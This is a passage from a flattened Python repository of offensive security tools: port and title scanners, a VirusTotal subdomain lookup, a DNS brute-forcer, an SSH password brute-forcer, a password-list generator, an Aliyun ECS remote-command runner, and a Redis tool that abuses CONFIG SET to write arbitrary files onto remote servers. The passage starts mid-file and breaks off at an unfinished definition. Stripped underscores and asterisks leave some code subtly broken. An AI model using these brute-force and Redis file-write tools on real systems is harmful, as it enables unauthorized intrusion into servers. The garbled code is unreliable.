import sys 6 | import queue 7 | import os 8 | from tqdm import tqdm 9 | STOP_ME = False 10 | msg_queue = queue.Queue() 11 | 12 | def print_msg(): 13 | while not STOP_ME: 14 | try: 15 | msg = msg_queue.get(timeout=0.1) 16 | sys.stdout.write('\r'+msg.ljust(os.get_terminal_size().columns)+'\n') 17 | except: 18 | continue 19 | 20 | def scan(ip,port): 21 | global msg_queue 22 | global count 23 | start_time = time.time() 24 | ss = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 25 | try: 26 | ss.settimeout(1) 27 | ss.connect((ip,int(port))) 28 | ss.send(b'\r\n\r\nexit\r\nquit\r\n') 29 | try: 30 | ss.recv(5) 31 | msg_queue.put("%s %s open" % (ip,port)) 32 | except Exception as e: 33 | pass#print(e) 34 | ss.close() 35 | except Exception as e: 36 | pass#print(e) 37 | if name == 'main': 38 | options = sys.argv 39 | ports = options[options.index('-p')+1] if '-p' in options else '' 40 | ip = options[options.index('-t')+1] if '-p' in options else '' 41 | thread_num = options[options.index('-n')+1] if '-n' in options else 50 42 | threading.Thread(target=print_msg).start() 43 | if ports and ip and len(options)>4: 44 | ports = ports.split(',') 45 | port_list = [] 46 | for p in ports: 47 | if '-' in p: 48 | p_list = p.split('-') 49 | ps = range(int(p_list[0]),int(p_list[-1])+1) 50 | port_list = port_list + list(ps) 51 | else: 52 | try: 53 | int(p) 54 | port_list.append(p) 55 | except: 56 | pass 57 | 58 | if ip.count('.') == 3: 59 | c = str(ip.split('.')[-1]) 60 | ab = '.'.join(ip.split('.')[:-1])+'.' 61 | if '-' in c: 62 | ips = [] 63 | for i in range(int(c.split('-')[0]),int(c.split('-')[-1])+1): 64 | ips.append(ab+str(i)) 65 | ip = ips 66 | else: 67 | ip = [ip] 68 | else: 69 | ip =[] 70 | threads = [] 71 | semaphore = threading.Semaphore(int(thread_num)) 72 | msg_queue.put("扫描ip %s 个,端口 %s 个，共 %s 个请求" % (len(ip),len(port_list),len(ip)len(port_list))) 73 | for i in ip: 74 | for p in port_list: 75 | threads.append(threading.Thread(target=scan,args=(i,p))) 76 | for t in tqdm(threads): 77 | while threading.activeCount()-3 >= int(thread_num): 78 | # #print(threading.activeCount()) 79 | time.sleep(0.1) 80 | # #continue 81 | t.start() 82 | #print(threading.activeCount()) 83 | time.sleep(3) 84 | STOP_ME=True 85 | 86 | else: 87 | msg_queue.put("%s -t 127.0.0.1 -p 80,88,8080-9000" % options[0]) 88 | msg_queue.put("%s -t 127.0.0.1-100 -p 80,88,8080-9000" % options[0]) 89 | STOP_ME=True 90 | -------------------------------------------------------------------------------- /scanTitle.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import threading 4 | import re 5 | import math 6 | import time 7 | import os 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | # 禁用安全请求警告 10 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 11 | onlyHttp = False # 只输出带http/https域名 12 | def getUrls(filename): 13 | f = open(filename,'r',encoding="utf8") 14 | lines = f.readlines() 15 | urls = [url.strip() for url in lines] 16 | return urls 17 | def check_http(target): 18 | """检测目录是否为http服务""" 19 | target = target.strip() 20 | headers={"User-Agent":"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"} 21 | try: 22 | url = "%s://%s/" % ("http",target) 23 | req = requests.get(url,headers=headers,verify=False,timeout=10) 24 | if req.status_code == 302 and "Location" in req.headers.keys(): 25 | if str(req.headers['Location']).startswith('https'): 26 | return "https" 27 | if req.status_code == 200: 28 | r = re.search(r"",req.text) 29 | if r: 30 | if r.group(1).startswith('https'): 31 | return "https" 32 | return "http" 33 | except: 34 | try: 35 | url = "%s://%s/" % ("https",target) 36 | requests.get(url,headers=headers,verify=False,timeout=10) 37 | return "https" 38 | except: 39 | return False 40 | def get_console_width(): 41 | return int(os.get_terminal_size().columns) 42 | 43 | def getTitle(url): 44 | server = "" 45 | console_width = get_console_width() 46 | aa = (0.3,0.3,0.1) if console_width > 80 else (0.4,0.2,0.3) 47 | a5 = int(console_widthaa[0]) 48 | a4 = int(console_widthaa[1]) 49 | try: 50 | http = check_http(url) 51 | if http and not onlyHttp: 52 | url = "%s://%s/" % (http,url) 53 | reqs = requests.get(url,timeout=10,verify=False) 54 | if reqs.status_code == 200: 55 | html = reqs.text 56 | if 'Content-Type' in reqs.headers.keys() and 'charset' in reqs.headers['Content-Type']: 57 | en = re.search(";(\s|)charset=(.?)$|charset=\"(.?)\"",reqs.headers['Content-Type']) 58 | else: 59 | en = re.search(";(\s|)charset=(.?)\"|charset=\"(.?)\"",reqs.text) 60 | if en: 61 | reqs.encoding=en.group(3) if en.group(2) == None else en.group(2) 62 | html = reqs.text 63 | title_re = re.search(r"(.?)", html) 64 | if title_re: 65 | t = title_re.group(1) 66 | if 'Server' in reqs.headers.keys(): 67 | server = reqs.headers['Server'] 68 | print(url.ljust(a5),server.ljust(a4),t) 69 | 70 | elif reqs.status_code in [404,403]: 71 | pass 72 | print(url.ljust(a5),server.ljust(a4),reqs.status_code) 73 | else: 74 | if http: 75 | print("%s://%s/" % (http,url)) 76 | except Exception as e: 77 | pass 78 | #print(e) 79 | def start(filename,threads=2): 80 | urls = getUrls(filename) 81 | for url in urls: 82 | while threading.active_count() > int(threads): 83 | time.sleep(0.5) 84 | threading.Thread(target=getTitle,args=(url,)).start() 85 | if name == 'main': 86 | if '-s' in sys.argv: 87 | onlyHttp = True 88 | sys.argv.remove('-s') 89 | if len(sys.argv) >2: 90 | start(sys.argv[1],sys.argv[2]) 91 | else: 92 | start(sys.argv[1]) 93 | -------------------------------------------------------------------------------- /ip2domains.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import re 4 | import socket 5 | import sys 6 | import asyncio 7 | import config 8 | #https://www.virustotal.com/ui/ip_addresses/216.160.212.12/resolutions #ip2domins 9 | #https://www.virustotal.com/ui/domains/hao123.com/subdomains #domain@subdomains 10 | #https://www.virustotal.com/vtapi/v2/domain/report?apikey=&domain= 11 | #https://www.virustotal.com/vtapi/v2/ip-address/report?apikey=&ip= 12 | class ipDomain: 13 | def init(self,target): 14 | self.apikey = config.vt_key 15 | self.target = target 16 | self.IP_DOMAINS = True #默认 17 | self.DOMAIN_SUBDOMAINS = False 18 | self.URL_API_IP = "https://try.readme.io/https://www.virustotal.com/vtapi/v2/ip-address/report?apikey=%s&ip=%%target%%" % (self.apikey) 19 | self.URL_API_DOMAIN = "https://try.readme.io/https://www.virustotal.com/vtapi/v2/domain/report?apikey=%s&domain=%%target%%" % (self.apikey) 20 | self.METHOD = "IP" if self.__checkip(self.target) else "DOMAIN" 21 | self.URL_API = self.URL_API_IP.replace('%target%',self.target) if self.METHOD == "IP" else self.URL_API_DOMAIN.replace('%target%',self.target) 22 | self.scan() 23 | 24 | 25 | def checkip(self,target): 26 | r = re.match(r"([0-9]{1,3}\.){3}[0-9]{1,3}",target) 27 | if r: 28 | return True 29 | else: 30 | return False 31 | 32 | def get_html(sefl,url): 33 | try: 34 | headers = {'Origin': 'https://developers.virustotal.com'} 35 | req = requests.get(url,headers=headers,timeout=5) 36 | html = req.text 37 | return html 38 | except Exception as e: 39 | #print("Function %s Err: %s" % (sys._getframe().f_code.co_name,e)) 40 | return "" 41 | 42 | def __str_json(self,json_str): 43 | try: 44 | json_text = json.loads(json_str) 45 | if "resolutions" not in json_text.keys(): 46 | return "" 47 | else: 48 | return json_text 49 | except Exception as e: 50 | print("Function %s Err: %s" % (sys._getframe().f_code.co_name,e)) 51 | return "" 52 | 53 | def __get_next(self,json_text): 54 | if json_text: 55 | try: 56 | next_link = json_text['links']['next'] if "next" in json_text['links'].keys() else "" 57 | except Exception as e: 58 | next_list = "" 59 | if next_link: 60 | return next_link 61 | else: 62 | return "" 63 | else: 64 | return "" 65 | 66 | async def __domain_ip(self,loop,domain): 67 | socket.setdefaulttimeout(2) 68 | try: 69 | info = await loop.getaddrinfo( 70 | domain,80, 71 | proto=socket.IPPROTO_TCP, 72 | ) 73 | ip = info[0][4][0] 74 | print((ip,domain)) 75 | except Exception as e: 76 | #print("Function %s Err: %s" % (sys._getframe().f_code.co_name,e)) 77 | print(("127.0.0.1",domain)) 78 | 79 | 80 | def __get_data(self,json_text): 81 | out_list = [] 82 | loop = asyncio.get_event_loop() 83 | if not json_text:return out_list 84 | if self.METHOD == "IP": 85 | for j in json_text['resolutions']: 86 | ip = self.target 87 | subdomain = j['hostname'] 88 | print((ip,subdomain)) 89 | elif self.METHOD == "DOMAIN": 90 | tasks = [] 91 | for j in json_text['subdomains']: 92 | tasks.append(self.__domain_ip(loop,j)) 93 | loop.run_until_complete(asyncio.wait(tasks)) 94 | loop.close() 95 | 96 | def scan(self): 97 | next_link = self.URL_API 98 | out_list = [] 99 | json_text = self.__str_json(self.__get_html(next_link)) 100 | self.__get_data(json_text) 101 | 102 | 103 | 104 | if name == 'main': 105 | if len(sys.argv)==2: 106 | ipDomain(sys.argv[1]) 107 | else: 108 | print("Eg: %s 127.0.0.1 查询旁站" % sys.argv[0]) 109 | print("Eg: %s hey235.com 查询子域名" % sys.argv[0]) 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | -------------------------------------------------------------------------------- /brute.py: -------------------------------------------------------------------------------- 1 | from paramiko.client import SSHClient, AutoAddPolicy 2 | import IPy 3 | import sys 4 | import os 5 | from queue import Queue 6 | import threading 7 | from time import sleep 8 | import socket 9 | 10 | class brute(): 11 | def init(self): 12 | self.hosts = [] 13 | self.users = [] 14 | self.passwd = [] 15 | self.port = 22 16 | self.thread = 10 17 | self.wait_thread=0 18 | self.lock = threading.Lock() 19 | self.queue = Queue() 20 | 21 | def __ssh_login(self,host,user,passwd): 22 | try: 23 | ssh_client = SSHClient() 24 | ssh_client.set_missing_host_key_policy(AutoAddPolicy()) 25 | ssh_client.connect(hostname=str(host),port=self.port,username=user,password=passwd) 26 | print("check success:%s %s %s" % (host,user,passwd)) 27 | except: 28 | pass 29 | self.lock.acquire() 30 | self.wait_thread = self.wait_thread - 1 31 | self.lock.release() 32 | 33 | def __check_file(self,filename): 34 | return os.path.isfile(filename) 35 | 36 | def set_hosts(self,ips): 37 | self.hosts = list(IPy.IP(ips)) 38 | 39 | def set_user(self,user): 40 | self.users = [user] 41 | 42 | def set_passwd(self,passwd): 43 | self.passwd = [passwd] 44 | 45 | def set_user_from_file(self,filename): 46 | if self.__check_file(filename): 47 | self.users = self.__read_file(filename) 48 | else: 49 | exit("Not found file %s " % filename) 50 | 51 | def set_passwd_from_file(self,filename): 52 | if self.__check_file(filename): 53 | self.passwd = self.__read_file(filename) 54 | else: 55 | exit("Not found file %s " % filename) 56 | 57 | def __read_file(self,filename): 58 | return open(filename.strip(),'r').readlines() 59 | 60 | def __check_port(self,host,port): 61 | try: 62 | sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | sk.settimeout(3) 64 | sk.connect((host,port)) 65 | sk.close 66 | self.hosts.append(host) 67 | except: 68 | pass 69 | self.lock.acquire() 70 | self.wait_thread = self.wait_thread - 1 71 | self.lock.release() 72 | 73 | def __host_port_access(self): 74 | hosts = self.hosts 75 | self.hosts = [] 76 | self.wait_thread = len(hosts) 77 | for host in hosts: 78 | while threading.activeCount() > self.thread: 79 | sleep(0.1) 80 | threading.Thread(target=self.__check_port,args=(str(host),self.port)).start() 81 | while self.wait_thread != 0: 82 | sleep(0.1) 83 | print("port scan done") 84 | 85 | def ssh_check(self): 86 | self.__host_port_access() 87 | self.wait_thread=len(self.hosts)len(self.users)len(self.passwd) 88 | for host in self.hosts: 89 | for user in self.users: 90 | for p in self.passwd: 91 | while threading.activeCount() > self.thread: 92 | sleep(0.1) 93 | threading.Thread(target=self.__ssh_login,args=(host,user.strip(),p.strip())).start() 94 | while self.wait_thread != 0: 95 | sleep(0.1) 96 | if name == 'main': 97 | method="" 98 | brute = brute() 99 | args=sys.argv 100 | if len(args) != 9: 101 | help=""" 102 | help: 103 | -m set brute method eg:ssh 104 | -h set host eg:127.0.0.1/24 105 | -u set one user 106 | -U set user file 107 | -p set one pass 108 | -P set pass file 109 | %s -m ssh -h 10.10.1.0/24 -u root -p 123456 110 | """ % (args[0]) 111 | exit(help) 112 | brute.set_hosts(args[args.index('-h')+1]) 113 | if '-u' in args: 114 | brute.set_user(args[args.index('-u')+1]) 115 | if '-U' in args and '-u' not in args: 116 | brute.set_user_from_file(args[args.index('-U')+1]) 117 | if '-p' in args: 118 | brute.set_passwd(args[args.index('-p')+1]) 119 | if '-P' in args and '-p' not in args: 120 | brute.set_passwd_from_file(args[args.index('-P')+1]) 121 | method = args[args.index('-m')+1] 122 | if method=='ssh': 123 | brute.ssh_check() 124 | -------------------------------------------------------------------------------- /passdict/pass.py: -------------------------------------------------------------------------------- 1 | import sys 2 | class password: 3 | def init(self,p=[],a=[],e=[]): 4 | try: 5 | and_file = open('dict/and.dict') 6 | ext_file = open('dict/ext.dict') 7 | pre_file = open('dict/pre.dict') 8 | except Exception as e: 9 | print("字典文件不存在") 10 | print("Error:%s" % e) 11 | exit() 12 | self.sem = False 13 | self.and_list = and_file.readlines() + a 14 | and_file.close() 15 | self.ext_list = ext_file.readlines() + e 16 | ext_file.close() 17 | self.pre_file = pre_file.readlines() + p 18 | pre_file.close() 19 | self.pass_list=[] 20 | 21 | def set_sem(self,option): 22 | """设置输出是否使用:号连接""" 23 | self.sem = option 24 | 25 | def get(self,strkey,prelist,andlist,extlist): 26 | out_list = [] 27 | try: 28 | strkey = str(strkey) 29 | for strpre in prelist: 30 | for strand in andlist: 31 | for strext in extlist: 32 | out_list.append(strpre.strip()+strkey+strand.strip()+strext.strip()) 33 | self.dict_list = out_list 34 | return out_list 35 | except Exception as e: 36 | print("组合字典过程发生错误") 37 | print("Err:%s" % e) 38 | exit() 39 | 40 | def out_file(self,keyword,out_file_path): 41 | try: 42 | out_file_hand = open(out_file_path,'w') 43 | except Exception as e: 44 | print("创建输出文件失败") 45 | print("Err:%s" % e) 46 | exit() 47 | out_list = self.get(keyword,self.pre_file,self.and_list,self.ext_list) 48 | if len(self.pass_list) > 0: 49 | out_list = out_list + self.pass_list 50 | for dict_line in out_list: 51 | out_file_hand.write(dict_line+'\n') 52 | out_file_hand.close() 53 | 54 | def out_print(self,keyword): 55 | out_list = self.get(keyword, self.pre_file, self.and_list, self.ext_list) 56 | if len(self.pass_list) > 0: 57 | out_list = out_list + self.pass_list 58 | for dict_line in out_list: 59 | if not self.sem: 60 | print(dict_line) 61 | else: 62 | print("%s:%s" % (keyword,dict_line)) 63 | 64 | def add_pass(self): 65 | pass_file_hand = open('dict/password.dict') 66 | pass_list = pass_file_hand.readlines() 67 | pass_file_hand.close() 68 | for pass_line in pass_list: 69 | self.pass_list.append(pass_line.strip()) 70 | 71 | 72 | if '--keyword' in sys.argv: 73 | exts = [] 74 | ands = [] 75 | pres = [] 76 | keyword = sys.argv[sys.argv.index('--keyword') + 1] 77 | if '--ext' in sys.argv: 78 | exts = sys.argv[sys.argv.index('--ext') + 1].split(',') 79 | if '--and' in sys.argv: 80 | ands = sys.argv[sys.argv.index('--and') + 1].split(',') 81 | if '--pre' in sys.argv: 82 | pres = sys.argv[sys.argv.index('--pre') + 1].split(',') 83 | pass_class = password(e=exts,a=ands,p=pres) 84 | if '--sem' in sys.argv: 85 | pass_class.set_sem(True) 86 | if '--pass' in sys.argv: 87 | pass_class.add_pass() 88 | if '--print' in sys.argv: 89 | pass_class.out_print(keyword) 90 | if '--file' in sys.argv: 91 | out_path = sys.argv[sys.argv.index('--file') + 1] 92 | pass_class.out_file(keyword,out_path) 93 | else: 94 | print("--keyword 指定字符串") 95 | print("--ext 添加自定义后缀") 96 | print("--and 添加自定义连接符") 97 | print("--pre 添加自定义前缀") 98 | print("--pass 将dict/password.dict中的字典加入返回") 99 | print("--file path 将字典写入path") 100 | print("--sem 用:号将用户名与密码拼接 admin:123456") 101 | print("--print 直接输出") 102 | print("Eg:%s --keyword admin --print" % sys.argv[0]) 103 | print("Eg:%s --keyword admin --file ./test.dict" % sys.argv[0]) 104 | -------------------------------------------------------------------------------- /redisWriteFile.py: -------------------------------------------------------------------------------- 1 | # -- coding=utf-8 -- 2 | import argparse 3 | import sys 4 | import socket 5 | 6 | class redis: 7 | def init(self): 8 | self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | self.flushall = False 10 | 11 | def set_flushall(self,b): 12 | self.flushall = b 13 | 14 | def rdata(self,flag,c=None): 15 | if flag == "cgd": # config get dir 16 | data = "3\r\n$6\r\nconfig\r\n$3\r\nget\r\n$3\r\ndir\r\n" 17 | elif flag == "cgn": # config get dbfilename 18 | data = "3\r\n$6\r\nconfig\r\n$3\r\nget\r\n$10\r\ndbfilename\r\n" 19 | elif flag == "csd":# config set dir c 20 | data = "4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$%s\r\n%s\r\n" %(len(c),c) 21 | elif flag == "csn": # config set dbfilename c 22 | data = "4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$%s\r\n%s\r\n" % (len(c),c) 23 | elif flag == "fa": # flushall 24 | data = "1\r\n$8\r\nflushall\r\n" 25 | elif flag == "s": # save 26 | data = "1\r\n$4\r\nsave\r\n" 27 | elif flag == "a": # auth passwd 28 | data = "2\r\n$4\r\nauth\r\n$%s\r\n%s\r\n" % (len(c),c) 29 | elif flag == "i": # info 30 | data = "1\r\n$4\r\ninfo\r\n" 31 | elif flag == "sk": # set key c 32 | data = "3\r\n$3\r\nset\r\n$11\r\nredis_write\r\n$%s\r\n%s\r\n" % (len(c),c) 33 | return data.encode() 34 | 35 | 36 | def connect_redis(self,host,port,passwd=None): 37 | self.sock.connect((host,port)) 38 | if passwd: 39 | self.send_data(self.rdata("a",passwd)) 40 | out = self.send_data(self.rdata("i")) 41 | if "redis_version" in out: 42 | print("%s:%s 连接成功"% (host,port)) 43 | else: 44 | print("连接失败") 45 | print(out) 46 | exit() 47 | 48 | def send_data(self,data): 49 | self.sock.send(data) 50 | out = b"" 51 | while True: 52 | tmp = self.sock.recv(10240) 53 | #print(tmp) 54 | out = out + tmp 55 | if len(tmp)==0 or tmp[-2]==13 or tmp[-2] == "\r":break # 存在bug 56 | return out.decode() 57 | 58 | 59 | def write_file(self,sfile,dfile): 60 | sdata = open(sfile,"r").read() 61 | filedir = "/".join(dfile.split('/')[:-1]) 62 | filename = dfile.split('/')[-1] 63 | #记录原配置 64 | sdir = self.send_data(self.rdata("cgd")).split("\r\n")[-2] 65 | print("原目录 %s" % (sdir.encode() if not isinstance(sdir,str) else sdir)) 66 | sdbfilename = self.send_data(self.rdata("cgn")).split("\r\n")[-2] 67 | print("原文件 %s" % (sdbfilename.encode() if not isinstance(sdbfilename,str) else sdbfilename)) 68 | #写文件 69 | check = self.send_data(self.rdata("csd",filedir)) 70 | if "OK" in check: 71 | print("文件 %s 写入成功" % dfile) 72 | else: 73 | print("文件 %s 写入失败!没有权限或目录不存在。" % dfile) 74 | exit() 75 | self.send_data(self.rdata("csn",filename)) 76 | if self.flushall: 77 | self.send_data(self.rdata("fa")) 78 | self.send_data(self.rdata("sk","\n\n"+sdata.strip()+"\n\n")) 79 | self.send_data(self.rdata("s")) 80 | #还原配置 81 | self.send_data(self.rdata("csd",sdir)) 82 | self.send_data(self.rdata("csn",sdbfilename)) 83 | 84 | 85 | 86 | if name == "main": 87 | parser = argparse.ArgumentParser() 88 | parser.add_argument("-d",metavar="IP",help="Redis IP") 89 | parser.add_argument("-p",metavar="Post",help="Redis Port") 90 | parser.add_argument("-a",metavar="Password",help="Redis Password") 91 | parser.add_argument("-f",action='store_true',help="Redis command flushall") 92 | parser.add_argument("SourceFile",help="Source File") 93 | parser.add_argument("DestinationFile",help="Destination File") 94 | args = parser.parse_args() 95 | ip = args.d 96 | port = args.p 97 | passwd = args.a 98 | sfile = args.SourceFile 99 | dfile = args.DestinationFile 100 | redis = redis() 101 | if args.f: 102 | redis.set_flushall(True) 103 | redis.connect_redis(ip,int(port),passwd) 104 | redis.write_file(sfile,dfile) 105 | 106 | 107 | -------------------------------------------------------------------------------- /aliyunECS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | 4 | try: 5 | from aliyunsdkcore.client import AcsClient 6 | from aliyunsdkcore.acs_exception.exceptions import ClientException 7 | from aliyunsdkcore.acs_exception.exceptions import ServerException 8 | from aliyunsdkecs.request.v20140526.DescribeInstanceAttributeRequest import DescribeInstanceAttributeRequest 9 | from aliyunsdkecs.request.v20140526.DescribeRegionsRequest import DescribeRegionsRequest 10 | from aliyunsdkecs.request.v20140526.DescribeInstanceStatusRequest import DescribeInstanceStatusRequest 11 | from aliyunsdkecs.request.v20140526.RunCommandRequest import RunCommandRequest 12 | from aliyunsdkecs.request.v20140526.DescribeInvocationResultsRequest import DescribeInvocationResultsRequest 13 | except Exception as e: 14 | print(e) 15 | print("请先安装aliyun sdk 库") 16 | print("pip3 install aliyun-python-sdk-core") 17 | print("pip3 install aliyun-python-sdk-ecs") 18 | exit() 19 | import json 20 | import base64 21 | import time 22 | #密钥信息 23 | accessKeyId="aaaa" 24 | accessSecret="ffff" 25 | if not accessKeyId or not accessSecret: 26 | print("请填写accessKeyId与accessSecret密钥信息!") 27 | exit() 28 | def get_regionid(): 29 | client = AcsClient(accessKeyId, accessSecret, 'cn-hangzhou') 30 | request = DescribeRegionsRequest() 31 | request.set_accept_format('json') 32 | response = client.do_action_with_exception(request) 33 | return json.loads(str(response, encoding='utf-8'))["Regions"]["Region"] 34 | 35 | 36 | def get_ecsid(regionID): 37 | client = AcsClient(accessKeyId, accessSecret, regionID) 38 | request = DescribeInstanceStatusRequest() 39 | request.set_accept_format('json') 40 | response = client.do_action_with_exception(request) 41 | InstanceStatuses=json.loads(str(response, encoding='utf-8'))["InstanceStatuses"] 42 | return InstanceStatuses["InstanceStatus"] 43 | 44 | 45 | def get_status(ecsid): 46 | client = AcsClient(accessKeyId, accessSecret, 'cn-hangzhou') 47 | request = DescribeInstanceAttributeRequest() 48 | request.set_accept_format('json') 49 | request.set_InstanceId(ecsid) 50 | response = client.do_action_with_exception(request) 51 | return json.loads(str(response, encoding='utf-8')) 52 | 53 | def exec_ecs(ecsid,command): 54 | regionID = get_status(ecsid)["RegionId"] 55 | client = AcsClient(accessKeyId, accessSecret, regionID) 56 | request = RunCommandRequest() 57 | request.set_accept_format('json') 58 | request.set_Type("RunShellScript") 59 | request.set_CommandContent(command) 60 | request.set_InstanceIds([ecsid]) 61 | response = client.do_action_with_exception(request) 62 | return json.loads(str(response, encoding='utf-8')) 63 | 64 | 65 | 66 | def get_result(ecsid,invokeid): 67 | regionID = get_status(ecsid)["RegionId"] 68 | client = AcsClient(accessKeyId,accessSecret,regionID) 69 | request = DescribeInvocationResultsRequest() 70 | request.set_accept_format('json') 71 | request.set_InstanceId(ecsid) 72 | request.set_InvokeId(invokeid) 73 | response = client.do_action_with_exception(request) 74 | return json.loads(str(response, encoding='utf-8')) 75 | 76 | def listecs(): 77 | regions = get_regionid() 78 | for region in regions: 79 | regionID = region["RegionId"] 80 | ecsids = get_ecsid(regionID) 81 | if len(ecsids) > 0: 82 | print("地区: ",region["LocalName"] + " - " + region["RegionId"]) 83 | for ids in ecsids: 84 | info = get_status(ids["InstanceId"]) 85 | print("---->实列ID: %s (%s)" % (ids["InstanceId"],ids["Status"])) 86 | print("---->公有IP: " ,info["PublicIpAddress"]["IpAddress"]) 87 | print("---->私有IP: " ,info["VpcAttributes"]["PrivateIpAddress"]["IpAddress"]) 88 | print("---->镜像名: ",info["ImageId"]) 89 | print("") 90 | def exececs(ecsid,command): 91 | comm = exec_ecs(ecsid,command) 92 | invokeid = comm["InvokeId"] 93 | time.sleep(1) 94 | print(base64.b64decode(get_result(ecsid,invokeid)["Invocation"]["InvocationResults"]["InvocationResult"][0]["Output"]).decode()) 95 | if name == "main": 96 | import sys 97 | args = sys.argv 98 | action = args[1] if len(args) > 1 else "help" 99 | if "list" == action: 100 | listecs() 101 | elif "exec" == action: 102 | ecsid = args[2] 103 | command = args[3] 104 | exececs(ecsid,command) 105 | else: 106 | print(args[0],"list 列出ECS") 107 | print(args[0],"exec 实列ID 命令") 108 | -------------------------------------------------------------------------------- /dnsbrute.py: -------------------------------------------------------------------------------- 1 | import dns.resolver as dnsquery 2 | import os 3 | import sys 4 | import threading 5 | import time 6 | import requests 7 | import queue 8 | import re 9 | class dnsbrute: 10 | def init(self,sub_dict_path,sub3_dict_path,threads=50,dns_server_list=[]): 11 | if self.check_isfile(sub_dict_path): 12 | self.sub_dict_path = sub_dict_path 13 | else: 14 | exit("二级子域名字典(%s)不存在" % sub_dict_path) 15 | if self.check_isfile(sub3_dict_path): 16 | self.sub3_dict_path = sub3_dict_path 17 | else: 18 | exit("三级子域名字典(%s)不存在" % sub3_dict_path) 19 | self.d = dnsquery.Resolver() 20 | self.d.timeout=self.d.lifetime=2.0 21 | self.dns_server_list = ['114.114.114.114','223.5.5.5'] if not dns_server_list else dns_server_list 22 | self.d.nameservers=self.dns_server_list 23 | self.threads = int(threads) 24 | self.sub2_list = [] #存放存在的二级域名 25 | self.black_list = [] #存放API传入的已查询到的子域名 26 | self.company_id = 1 #目标企业 27 | self.msg_queue = queue.Queue() 28 | self.count = 1 29 | self.STOP_ME = False 30 | self.sub_sum = 1 31 | self.sub2_len = len(open(self.sub_dict_path,'r').readlines()) 32 | self.sub3_len = len(open(self.sub3_dict_path,'r').readlines()) 33 | self.sub2_count=0 34 | threading.Thread(target=self._print_msg).start() 35 | def _print_msg(self): 36 | _console_width = int(os.get_terminal_size().columns) 37 | while not self.STOP_ME: 38 | try: 39 | _msg = self.msg_queue.get(timeout=0.5) 40 | except: 41 | continue 42 | if _msg[:4] == 'true': 43 | sys.stdout.write('\r'+_msg[4:].ljust(_console_width)+'\n') 44 | else: 45 | _msg += ' '+str(self.count)+'/'+str(self.sub2_len + (self.sub2_countself.sub3_len)) 46 | sys.stdout.write('\r'+_msg.ljust(_console_width-len(_msg))) 47 | 48 | def set_black_list(self,b_list): 49 | self.black_list=b_list 50 | 51 | def set_company_id(self,id): 52 | self.company_id = id 53 | 54 | def check_cdn(self,domain): 55 | """检测是否有泛解析""" 56 | if not self.gethostbyname('x1x2x3x4dns',domain): 57 | return False 58 | return True 59 | 60 | def check_isfile(self,path): 61 | """检测文件是否存在""" 62 | if os.path.isfile(path): 63 | return path 64 | return "" 65 | 66 | def gethostbyname(self,sub,domain): 67 | if sub and domain: 68 | subdomain = "%s.%s" % (sub,domain) 69 | else: 70 | return 71 | self.msg_queue.put(">>%s"%(subdomain.strip())) 72 | self.count += 1 73 | if subdomain in self.black_list: 74 | return 75 | try: 76 | d = self.d.query(subdomain) 77 | except dnsquery.NXDOMAIN as e: 78 | return 79 | except Exception as e: 80 | return 81 | for j in d.response.answer: 82 | if j.rdtype == 1: 83 | self.sub2_list.append(sub) 84 | self.sub2_count += 1 85 | self.msg_queue.put("true%s %s"%(subdomain,j[0])) 86 | 87 | def dnsbrute_start(self,domain): 88 | if self.check_cdn(domain): 89 | print("存在泛解析") 90 | return 91 | with open(self.sub_dict_path,'r') as lines: 92 | subs = lines.readlines() 93 | for sub in subs: 94 | while threading.active_count() > self.threads: 95 | time.sleep(0.1) 96 | threading.Thread(target=self.gethostbyname,args=(sub.strip(),domain.strip())).start() 97 | if len(self.sub2_list) > 0: 98 | with open(self.sub3_dict_path,'r') as lines: 99 | subs = lines.readlines() 100 | for sub2 in self.sub2_list: 101 | for sub3 in subs: 102 | sub = sub3 + '.' + sub2 103 | while threading.active_count() > self.threads: 104 | time.sleep(0.01) 105 | threading.Thread(target=self.gethostbyname,args=(sub.strip(),domain.strip())).start() 106 | while threading.active_count() > 2: 107 | print(threading.active_count()) 108 | time.sleep(1) 109 | self.STOP_ME = True 110 | 111 | if name == 'main': 112 | ss = dnsbrute('/tmp/subdomain.dict','/tmp/subdomain3.dict',threads=300) 113 | ss.dnsbrute_start(sys.argv[1]) 114 | 115 | -------------------------------------------------------------------------------- /bigData.py: -------------------------------------------------------------------------------- 1 | import json 2 | import base64 3 | import config 4 | import requests 5 | import re 6 | import sys 7 | import time 8 | 9 | 10 | class bigData(): 11 | def init(self,keyword): 12 | self.fofa = False 13 | self.hunter = False 14 | self.censys = False 15 | self.shoadan = False 16 | #self.keyword = base64.b64encode(keyword.encode()).decode() 17 | self.keyword = keyword 18 | 19 | def importAuth(self): 20 | try: 21 | print("Import Auth") 22 | configFields = set(dir(config)) 23 | self.fofa = True if len(set(["fofa_key","fofa_email"]) & configFields) == 2 else False 24 | self.hunter = True if len(set(["hunter_key","hunter_username"]) & configFields) == 2 else False 25 | self.censys = True if len(set(["censys_key","censys_email"]) & configFields) == 2 else False 26 | self.shodan = True if len(set(["shodan_key"]) & configFields) ==1 else False 27 | except Exception as e: 28 | exit(e) 29 | 30 | def sendReq(self,url): 31 | headers = {"User-Agent":"curl/7.64.1"} 32 | req = requests.get(url,headers=headers) 33 | if req.status_code == 200: 34 | return req.text 35 | return False 36 | 37 | 38 | def __SearchByfofa(self): 39 | if not self.fofa: 40 | return self.fofa 41 | keyword = self.keyword 42 | keyword = base64.b64encode(keyword.encode()).decode() 43 | displayFields = ["ip","port","host","title"] 44 | api_url = "https://fofa.info/api/v1/search/all?email={email}&key={key}&qbase64={b64_keyword}&size=10000&fields={fields}" 45 | url = api_url.format(email=config.fofa_email,key=config.fofa_key,b64_keyword=keyword,fields=",".join(displayFields)) 46 | result = self.sendReq(url) 47 | if result: 48 | result = json.loads(result) 49 | for r in result.get('results',[]): 50 | print(r) 51 | 52 | 53 | def 